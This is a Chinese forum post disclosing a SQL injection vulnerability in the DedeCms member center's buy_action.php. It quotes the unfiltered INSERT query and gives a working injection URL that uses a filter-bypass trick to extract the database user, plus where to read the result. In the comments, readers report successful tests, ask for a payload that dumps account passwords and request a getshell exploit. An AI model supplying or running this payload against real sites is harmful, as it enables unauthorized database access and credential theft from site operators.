DedeCms 会员中心注入漏洞
member/buy_action.php
require_once(dirname(__FILE__)."/config.php");
CheckRank(0,0);
$menutype = 'mydede';
$menutype_son = 'op';
require_once DEDEINC.'/dedetemplate.class.php';
$product = isset($product) ? trim($product) : '';
$mid = $cfg_ml->M_ID;
$ptype = '';
$pname = '';
$price = '';
$mtime = time();
省略XX行
if(empty($product))
{
ShowMsg("请选择一个产品!", 'javascript:;');
exit();
}
省略xxx行
=if(!isset($paytype))
{
$inquery = "INSERT INTO #@__member_operation(`buyid` , `pname` , `product` , `money` , `mtime` , `pid` , `mid` , `sta` ,`oldinfo`)
VALUES ('$buyid', '$pname', '$product' , '$price' , '$mtime' , '$pid' , '$mid' , '0' , '$ptype');//product没有过滤
";
echo $inquery."<br>" ;注册用户之后验证邮箱完了之后 打开
127.0.0.1/dedecms/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
然后在http://127.0.0.1/dedecms/member/operation.php
就可以查看到返回信息了
关于作者
评论114次
又出洞了啊..dede还真是..
测试通过,`),((select user()),(select 1),'4 请问爆账户密码的语句是啥呢~
dede的产品表示没得说
现在开放注册的已经比较少了 饶过也不太好过了
这个洞洞还真多
dede再次中剑
@Cond0r 您好,想问下 ,@`'`), 这个代表着什么啊? 不加的话会有 Safe Alert: Request Error step 2! xi望解惑下,谢谢
DEDE 表示内心很受伤 要改名字了。。
正好需要哈哈
是要注册会员的哦
求最新getshell 漏洞
碉堡了。。。这个又是0day,为啥俺就早没看到呢
爱惜生命 远离织梦
Cond0r大牛又发福利了
大哥们 都是这么v5啊
感谢分享感谢分享
dede好多问题都是在用户中心
测试通过,`),((select user()),(select 1),'4 请问爆账户密码的语句是啥呢~
刘濞……貌似很厉害的样子!